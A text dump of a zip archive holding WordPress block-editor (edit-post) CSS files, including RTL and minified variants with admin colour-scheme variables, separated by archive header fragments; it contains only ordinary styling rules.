width:64px; z-index:100; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button{ align-items:center; border-radius:0; color:#fff; display:flex; height:100%; justify-content:center; overflow:hidden; padding:0; width:100%; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button:active,.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:hover{ color:#fff; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button:focus{ box-shadow:none; } .edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon img,.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon svg{ background:#1e1e1e; display:block; } .edit-post-fullscreen-mode-close-site-icon__icon{ fill:currentColor; height:100%; padding:12px; width:100%; } .edit-post-fullscreen-mode-close-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-post-fullscreen-mode-close.components-button:focus{ position:relative; } .edit-post-fullscreen-mode-close.components-button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-post-fullscreen-mode-close__back-icon{ align-items:center; background-color:#ccc; display:flex; height:64px; justify-content:center; pointer-events:none; position:absolute; right:0; top:0; width:64px; } .edit-post-fullscreen-mode-close__back-icon svg{ fill:currentColor; } .edit-post-fullscreen-mode-close__back-icon.has-site-icon{ backdrop-filter:saturate(180%) blur(15px); background-color:#fff9; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon{ width:64px; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon svg{ display:block; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon:after{ content:none; } .edit-post-meta-boxes-main{ background-color:#fff; display:flex; filter:drop-shadow(0 -1px rgba(0, 0, 0, .133)); flex-direction:column; outline:1px solid #0000; overflow:hidden; padding-block-start:32px; } .edit-post-meta-boxes-main__presenter{ box-shadow:0 1px #ddd; display:flex; height:32px; inset:0 0 auto; outline:1px solid #0000; position:relative; z-index:10000; } .edit-post-meta-boxes-main__presenter>button{ appearance:none; background-color:initial; border:none; outline:none; padding:0; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]{ align-items:center; cursor:pointer; display:flex; justify-content:space-between; padding-inline:24px 12px; width:100%; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]:is(:hover,:focus-visible){ color:var(--wp-admin-theme-color); } .edit-post-meta-boxes-main__presenter>button[aria-expanded]:focus-visible:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]>svg{ fill:currentColor; } .edit-post-meta-boxes-main__presenter button[role=separator]{ cursor:row-resize; inset:0; margin:auto; position:absolute; width:64px; } .edit-post-meta-boxes-main__presenter button[role=separator]:before{ background-color:#ddd; border-radius:2px; content:""; height:4px; inset-block:calc(50% - 2px) auto; outline:2px solid #0000; outline-offset:-2px; position:absolute; transform:translateX(50%); width:inherit; } @media not (prefers-reduced-motion){ .edit-post-meta-boxes-main__presenter button[role=separator]:before{ transition:width .3s ease-out; } } .edit-post-meta-boxes-main__presenter button[role=separator]:is(:hover,:focus-visible):before{ background-color:var(--wp-admin-theme-color); width:80px; } @media (pointer:coarse){ .edit-post-meta-boxes-main{ padding-block-start:36px; } .edit-post-meta-boxes-main__presenter{ height:36px; } } .edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{ overflow:auto; } .edit-post-meta-boxes-main__liner{ isolation:isolate; } .is-resizing.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{ display:unset; } .edit-post-layout__metaboxes{ clear:both; } .has-metaboxes .interface-interface-skeleton__content:has(.edit-post-meta-boxes-main) .editor-visual-editor{ flex-basis:0%; flex-shrink:1; } .has-metaboxes .editor-visual-editor.is-iframed{ isolation:isolate; } .components-editor-notices__snackbar{ bottom:24px; left:0; padding-left:24px; padding-right:24px; position:fixed; } .edit-post-layout .components-editor-notices__snackbar{ right:0; } @media (min-width:783px){ .edit-post-layout .components-editor-notices__snackbar{ right:160px; } } @media (min-width:783px){ .auto-fold .edit-post-layout .components-editor-notices__snackbar{ right:36px; } } @media (min-width:961px){ .auto-fold .edit-post-layout .components-editor-notices__snackbar{ right:160px; } } .folded .edit-post-layout .components-editor-notices__snackbar{ right:0; } @media (min-width:783px){ .folded .edit-post-layout .components-editor-notices__snackbar{ right:36px; } } body.is-fullscreen-mode .edit-post-layout .components-editor-notices__snackbar{ right:0 !important; } .edit-post-meta-boxes-area{ position:relative; } .edit-post-meta-boxes-area .inside,.edit-post-meta-boxes-area__container{ box-sizing:initial; } .edit-post-meta-boxes-area input,.edit-post-meta-boxes-area textarea{ box-sizing:border-box; } .edit-post-meta-boxes-area .postbox-header{ border-bottom:0; border-top:1px solid #ddd; } .edit-post-meta-boxes-area #poststuff{ margin:0 auto; min-width:auto; padding-top:0; } .edit-post-meta-boxes-area #poststuff .stuffbox>h3,.edit-post-meta-boxes-area #poststuff h2.hndle,.edit-post-meta-boxes-area #poststuff h3.hndle{ box-sizing:border-box; color:inherit; font-weight:600; outline:none; padding:0 24px; position:relative; width:100%; } .edit-post-meta-boxes-area .postbox{ border:0; color:inherit; margin-bottom:0; } .edit-post-meta-boxes-area .postbox>.inside{ color:inherit; margin:0; padding:0 24px 24px; } .edit-post-meta-boxes-area .postbox .handlediv{ height:44px; width:44px; } .edit-post-meta-boxes-area.is-loading:before{ background:#0000; bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-post-meta-boxes-area .components-spinner{ left:20px; position:absolute; top:10px; z-index:5; } .edit-post-meta-boxes-area .is-hidden{ display:none; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]{ border:1px solid #757575; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:checked{ background:#fff; border-color:#757575; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:before{ margin:-3px -4px; } .edit-post-meta-boxes-area__clear{ clear:both; } .edit-post-welcome-guide,.edit-template-welcome-guide{ width:312px; } .edit-post-welcome-guide__image,.edit-template-welcome-guide__image{ background:#00a0d2; margin:0 0 16px; } .edit-post-welcome-guide__image>img,.edit-template-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-post-welcome-guide__heading,.edit-template-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-post-welcome-guide__text,.edit-template-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 24px; padding:0 32px; } .edit-post-welcome-guide__inserter-icon,.edit-template-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-template-welcome-guide .components-button svg{ fill:#fff; } body.js.block-editor-page{ background:#fff; } body.js.block-editor-page #wpcontent{ padding-right:0; } body.js.block-editor-page #wpbody-content{ padding-bottom:0; } body.js.block-editor-page #wpbody-content>div:not(.block-editor):not(#screen-meta),body.js.block-editor-page #wpfooter{ display:none; } body.js.block-editor-page .a11y-speak-region{ right:-1px; top:-1px; } body.js.block-editor-page ul#adminmenu a.wp-has-current-submenu:after,body.js.block-editor-page ul#adminmenu>li.current>a.current:after{ border-left-color:#fff; } body.js.block-editor-page .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } .block-editor-page #wpwrap{ overflow-y:auto; } @media (min-width:782px){ .block-editor-page #wpwrap{ overflow-y:initial; } } .edit-post-visual-editor.is-iframed{ box-sizing:border-box; } .edit-post-visual-editor.is-iframed *,.edit-post-visual-editor.is-iframed :after,.edit-post-visual-editor.is-iframed :before{ box-sizing:inherit; } @media (min-width:600px){ .block-editor__container{ bottom:0; left:0; min-height:calc(100vh - 46px); position:absolute; right:0; top:0; } } @media (min-width:782px){ .block-editor__container{ min-height:calc(100vh - 32px); } body.is-fullscreen-mode .block-editor__container{ min-height:100vh; } } .block-editor__container img{ height:auto; max-width:100%; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!G9"dist/edit-post/classic-rtl.min.cssnuȯ.editor-styles-wrapper :where(:not(.is-layout-flex,.is-layout-grid))>.wp-block{margin-left:auto;margin-right:auto}html :where(.editor-styles-wrapper){padding:8px}html :where(.editor-styles-wrapper) .block-editor-block-list__layout.is-root-container>.wp-block[data-align=full]{margin-left:-8px;margin-right:-8px}html :where(.wp-block){margin-bottom:28px;margin-top:28px;max-width:840px}html :where(.wp-block)[data-align=wide]{max-width:1100px}html :where(.wp-block)[data-align=full]{max-width:none}html :where(.wp-block)[data-align=left],html :where(.wp-block)[data-align=right]{height:0;width:100%}html :where(.wp-block)[data-align=left]:before,html :where(.wp-block)[data-align=right]:before{content:none}html :where(.wp-block)[data-align=left]>*{float:left;margin-right:2em}html :where(.wp-block)[data-align=right]>*{float:right;margin-left:2em}html :where(.wp-block)[data-align=full],html :where(.wp-block)[data-align=wide]{clear:both}.wp-block-group>[data-align=full]{margin-left:auto;margin-right:auto}.wp-block-group.has-background>[data-align=full]{margin-right:-30px;width:calc(100% + 60px)}[data-align=full] .wp-block-group>.wp-block{padding-left:14px;padding-right:14px}@media (min-width:600px){[data-align=full] .wp-block-group>.wp-block{padding-left:0;padding-right:0}}[data-align=full] .wp-block-group>[data-align=full]{max-width:none;padding-left:0;padding-right:0;right:0;width:100%}[data-align=full] .wp-block-group.has-background>[data-align=full]{width:calc(100% + 60px)}PK!:oodist/edit-post/classic.cssnuȯ.editor-styles-wrapper :where(:not(.is-layout-flex,.is-layout-grid))>.wp-block{ margin-left:auto; margin-right:auto; } html :where(.editor-styles-wrapper){ padding:8px; } html :where(.editor-styles-wrapper) .block-editor-block-list__layout.is-root-container>.wp-block[data-align=full]{ margin-left:-8px; margin-right:-8px; } html :where(.wp-block){ margin-bottom:28px; margin-top:28px; max-width:840px; } html :where(.wp-block)[data-align=wide]{ max-width:1100px; } html :where(.wp-block)[data-align=full]{ max-width:none; } html :where(.wp-block)[data-align=left],html :where(.wp-block)[data-align=right]{ height:0; width:100%; } html :where(.wp-block)[data-align=left]:before,html :where(.wp-block)[data-align=right]:before{ content:none; } html :where(.wp-block)[data-align=left]>*{ float:left; margin-right:2em; } html :where(.wp-block)[data-align=right]>*{ float:right; margin-left:2em; } html :where(.wp-block)[data-align=full],html :where(.wp-block)[data-align=wide]{ clear:both; } .wp-block-group>[data-align=full]{ margin-left:auto; margin-right:auto; } .wp-block-group.has-background>[data-align=full]{ margin-left:-30px; width:calc(100% + 60px); } [data-align=full] .wp-block-group>.wp-block{ padding-left:14px; padding-right:14px; } @media (min-width:600px){ [data-align=full] .wp-block-group>.wp-block{ padding-left:0; padding-right:0; } } [data-align=full] .wp-block-group>[data-align=full]{ left:0; max-width:none; padding-left:0; padding-right:0; width:100%; } [data-align=full] .wp-block-group.has-background>[data-align=full]{ width:calc(100% + 60px); }PK!Rqqdist/edit-post/classic-rtl.cssnuȯ.editor-styles-wrapper :where(:not(.is-layout-flex,.is-layout-grid))>.wp-block{ margin-left:auto; margin-right:auto; } html :where(.editor-styles-wrapper){ padding:8px; } html :where(.editor-styles-wrapper) .block-editor-block-list__layout.is-root-container>.wp-block[data-align=full]{ margin-left:-8px; margin-right:-8px; } html :where(.wp-block){ margin-bottom:28px; margin-top:28px; max-width:840px; } html :where(.wp-block)[data-align=wide]{ max-width:1100px; } html :where(.wp-block)[data-align=full]{ max-width:none; } html :where(.wp-block)[data-align=left],html :where(.wp-block)[data-align=right]{ height:0; width:100%; } html :where(.wp-block)[data-align=left]:before,html :where(.wp-block)[data-align=right]:before{ content:none; } html :where(.wp-block)[data-align=left]>*{ float:left; margin-right:2em; } html :where(.wp-block)[data-align=right]>*{ float:right; margin-left:2em; } html :where(.wp-block)[data-align=full],html :where(.wp-block)[data-align=wide]{ clear:both; } .wp-block-group>[data-align=full]{ margin-left:auto; margin-right:auto; } .wp-block-group.has-background>[data-align=full]{ margin-right:-30px; width:calc(100% + 60px); } [data-align=full] .wp-block-group>.wp-block{ padding-left:14px; padding-right:14px; } @media (min-width:600px){ [data-align=full] .wp-block-group>.wp-block{ padding-left:0; padding-right:0; } } [data-align=full] .wp-block-group>[data-align=full]{ max-width:none; padding-left:0; padding-right:0; right:0; width:100%; } [data-align=full] .wp-block-group.has-background>[data-align=full]{ width:calc(100% + 60px); }PK!7g7g7dist/edit-post/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.edit-post-fullscreen-mode-close__view-mode-toggle{height:64px;left:0;top:0;width:64px;z-index:100}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button{align-items:center;border-radius:0;color:#fff;display:flex;height:100%;justify-content:center;overflow:hidden;padding:0;width:100%}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:active,.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:hover{color:#fff}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:focus{box-shadow:none}.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon img,.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon svg{background:#1e1e1e;display:block}.edit-post-fullscreen-mode-close-site-icon__icon{fill:currentColor;height:100%;padding:12px;width:100%}.edit-post-fullscreen-mode-close-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-post-fullscreen-mode-close.components-button:focus{position:relative}.edit-post-fullscreen-mode-close.components-button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-post-fullscreen-mode-close__back-icon{align-items:center;background-color:#ccc;display:flex;height:64px;justify-content:center;left:0;pointer-events:none;position:absolute;top:0;width:64px}.edit-post-fullscreen-mode-close__back-icon svg{fill:currentColor}.edit-post-fullscreen-mode-close__back-icon.has-site-icon{backdrop-filter:saturate(180%) blur(15px);background-color:#fff9}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon{width:64px}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon svg{display:block}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon:after{content:none}.edit-post-meta-boxes-main{background-color:#fff;display:flex;filter:drop-shadow(0 -1px rgba(0,0,0,.133));flex-direction:column;outline:1px solid #0000;overflow:hidden;padding-block-start:32px}.edit-post-meta-boxes-main__presenter{box-shadow:0 1px #ddd;display:flex;height:32px;inset:0 0 auto;outline:1px solid #0000;position:relative;z-index:10000}.edit-post-meta-boxes-main__presenter>button{appearance:none;background-color:initial;border:none;outline:none;padding:0}.edit-post-meta-boxes-main__presenter>button[aria-expanded]{align-items:center;cursor:pointer;display:flex;justify-content:space-between;padding-inline:24px 12px;width:100%}.edit-post-meta-boxes-main__presenter>button[aria-expanded]:is(:hover,:focus-visible){color:var(--wp-admin-theme-color)}.edit-post-meta-boxes-main__presenter>button[aria-expanded]:focus-visible:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.edit-post-meta-boxes-main__presenter>button[aria-expanded]>svg{fill:currentColor}.edit-post-meta-boxes-main__presenter button[role=separator]{cursor:row-resize;inset:0;margin:auto;position:absolute;width:64px}.edit-post-meta-boxes-main__presenter button[role=separator]:before{background-color:#ddd;border-radius:2px;content:"";height:4px;inset-block:calc(50% - 2px) auto;outline:2px solid #0000;outline-offset:-2px;position:absolute;transform:translateX(-50%);width:inherit}@media not (prefers-reduced-motion){.edit-post-meta-boxes-main__presenter button[role=separator]:before{transition:width .3s ease-out}}.edit-post-meta-boxes-main__presenter button[role=separator]:is(:hover,:focus-visible):before{background-color:var(--wp-admin-theme-color);width:80px}@media (pointer:coarse){.edit-post-meta-boxes-main{padding-block-start:36px}.edit-post-meta-boxes-main__presenter{height:36px}}.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{overflow:auto}.edit-post-meta-boxes-main__liner{isolation:isolate}.is-resizing.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{display:unset}.edit-post-layout__metaboxes{clear:both}.has-metaboxes .interface-interface-skeleton__content:has(.edit-post-meta-boxes-main) .editor-visual-editor{flex-basis:0%;flex-shrink:1}.has-metaboxes .editor-visual-editor.is-iframed{isolation:isolate}.components-editor-notices__snackbar{bottom:24px;padding-left:24px;padding-right:24px;position:fixed;right:0}.edit-post-layout .components-editor-notices__snackbar{left:0}@media (min-width:783px){.edit-post-layout .components-editor-notices__snackbar{left:160px}}@media (min-width:783px){.auto-fold .edit-post-layout .components-editor-notices__snackbar{left:36px}}@media (min-width:961px){.auto-fold .edit-post-layout .components-editor-notices__snackbar{left:160px}}.folded .edit-post-layout .components-editor-notices__snackbar{left:0}@media (min-width:783px){.folded .edit-post-layout .components-editor-notices__snackbar{left:36px}}body.is-fullscreen-mode .edit-post-layout .components-editor-notices__snackbar{left:0!important}.edit-post-meta-boxes-area{position:relative}.edit-post-meta-boxes-area .inside,.edit-post-meta-boxes-area__container{box-sizing:initial}.edit-post-meta-boxes-area input,.edit-post-meta-boxes-area textarea{box-sizing:border-box}.edit-post-meta-boxes-area .postbox-header{border-bottom:0;border-top:1px solid #ddd}.edit-post-meta-boxes-area #poststuff{margin:0 auto;min-width:auto;padding-top:0}.edit-post-meta-boxes-area #poststuff .stuffbox>h3,.edit-post-meta-boxes-area #poststuff h2.hndle,.edit-post-meta-boxes-area #poststuff h3.hndle{box-sizing:border-box;color:inherit;font-weight:600;outline:none;padding:0 24px;position:relative;width:100%}.edit-post-meta-boxes-area .postbox{border:0;color:inherit;margin-bottom:0}.edit-post-meta-boxes-area .postbox>.inside{color:inherit;margin:0;padding:0 24px 24px}.edit-post-meta-boxes-area .postbox .handlediv{height:44px;width:44px}.edit-post-meta-boxes-area.is-loading:before{background:#0000;bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:1}.edit-post-meta-boxes-area .components-spinner{position:absolute;right:20px;top:10px;z-index:5}.edit-post-meta-boxes-area .is-hidden{display:none}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]{border:1px solid #757575}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:checked{background:#fff;border-color:#757575}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:before{margin:-3px -4px}.edit-post-meta-boxes-area__clear{clear:both}.edit-post-welcome-guide,.edit-template-welcome-guide{width:312px}.edit-post-welcome-guide__image,.edit-template-welcome-guide__image{background:#00a0d2;margin:0 0 16px}.edit-post-welcome-guide__image>img,.edit-template-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-post-welcome-guide__heading,.edit-template-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-post-welcome-guide__text,.edit-template-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 24px;padding:0 32px}.edit-post-welcome-guide__inserter-icon,.edit-template-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-template-welcome-guide .components-button svg{fill:#fff}body.js.block-editor-page{background:#fff}body.js.block-editor-page #wpcontent{padding-left:0}body.js.block-editor-page #wpbody-content{padding-bottom:0}body.js.block-editor-page #wpbody-content>div:not(.block-editor):not(#screen-meta),body.js.block-editor-page #wpfooter{display:none}body.js.block-editor-page .a11y-speak-region{left:-1px;top:-1px}body.js.block-editor-page ul#adminmenu a.wp-has-current-submenu:after,body.js.block-editor-page ul#adminmenu>li.current>a.current:after{border-right-color:#fff}body.js.block-editor-page .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}.block-editor-page #wpwrap{overflow-y:auto}@media (min-width:782px){.block-editor-page #wpwrap{overflow-y:initial}}.edit-post-visual-editor.is-iframed{box-sizing:border-box}.edit-post-visual-editor.is-iframed *,.edit-post-visual-editor.is-iframed :after,.edit-post-visual-editor.is-iframed :before{box-sizing:inherit}@media (min-width:600px){.block-editor__container{bottom:0;left:0;min-height:calc(100vh - 46px);position:absolute;right:0;top:0}}@media (min-width:782px){.block-editor__container{min-height:calc(100vh - 32px)}body.is-fullscreen-mode .block-editor__container{min-height:100vh}}.block-editor__container img{height:auto;max-width:100%}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media 